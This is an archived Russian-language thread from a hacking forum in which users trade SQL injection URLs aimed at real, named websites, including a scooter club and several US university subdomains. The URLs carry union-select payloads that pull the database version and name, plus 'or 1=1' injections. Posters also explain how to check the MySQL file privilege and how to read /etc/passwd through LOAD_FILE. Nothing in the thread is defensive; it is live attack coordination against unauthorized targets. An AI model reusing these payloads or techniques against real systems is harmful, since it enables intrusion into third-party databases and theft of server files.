ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
20.02.2009, 00:01
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
u36a,
Код:
http://scooter-club.ru/index.php?content=yes&page_id=-49+union+select+1,version()/*
|
|
|
20.02.2009, 00:02
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме:
5571194
Репутация:
1934
|
|
http://scooter-club.ru/index.php?content=yes&page_id=-1+union+select+1,database()+/*
__________________
Появляюсь редко. Важные дела в реале.
|
|
|
|
20.02.2009, 00:10
|
|
Познающий
Регистрация: 18.11.2008
Сообщений: 53
Провел на форуме:
170968
Репутация:
10
|
|
А есть ли возможность посмотреть присутствует ли file_priv у данного пользователя?
|
|
|
|
20.02.2009, 00:14
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
если доступа к mysql.user нет - то скорей всего file_priv нет. А если есть доступ то запрашиваешь колонку file_priv из таблицы mysql.user - если Y -то есть, если N - то нет
|
|
|
|
20.02.2009, 00:16
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
u36a, возможность есть. в твоем случает file_priv не присутствует 
https://forum.antichat.ru/showpost.php?p=942609&postcount=34
вот тут все описано, не буду цитировать.
Последний раз редактировалось faza02; 20.02.2009 в 00:20..
|
|
|
|
20.02.2009, 00:16
|
|
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549
Репутация:
1318
|
|
u36a, сделай в поле вывода LOAD_FILE('/etc/passwd') если сервак юниксовый... при наличии файлприва получишь содержимое, при отсутствии - или пустоту или ошибки... Ну в общем вывода не будет...
|
|
|
|
20.02.2009, 00:24
|
|
Новичок
Регистрация: 19.02.2009
Сообщений: 25
Провел на форуме:
57669
Репутация:
10
|
|
спасибо , счас почитаю)))))
|
|
|
|
20.02.2009, 00:24
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
Сообщение от faza02
https://forum.antichat.ru/showpost.php?p=942609&postcount=34
вот тут все описано, не буду цитировать.
Помимо там описанного не забываем так же о табличке user_privileges из information_schema.
SELECT grantee,is_grantable FROM information_schema.user_privileges WHERE privilege_type = ‘file’ AND grantee like ‘%username%'
u36a, но в твоем случае это не прокатит т.к. версия 4.1. Заюзай вариант с LOAD_FILE, как уже было предложено
|
|
|
|
20.02.2009, 02:43
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
что то у меня не получается)
http://studorgs.bowdoin.edu/meddies/members.php?mid=-27+or+1=1/*
http://cyberbuzz.gatech.edu/ice_hockey/news.php?nid=-4+or+1=1/*&PHPSESSID=8021c6f2f9284e9566bd87b298ef8f30
http://ext.wsu.edu/pnn/user/viewNotification.php?nid=-2007-326+or+1=1--
http://studorgs.bowdoin.edu/meddies/news.php?nid=-10+or+1=1/*
http://www.umass.edu/research/rld/bioportal/viewfac.php?fid=-79+or+1=1/*
Последний раз редактировалось sabe; 20.02.2009 в 03:03..
|
|
|
|
20.02.2009, 02:51
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134
Репутация:
519
|
|
http://www.mgv.edu/view_news.php?nid=-1+union+select+1,version(),3,4--
а в чем проблема?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
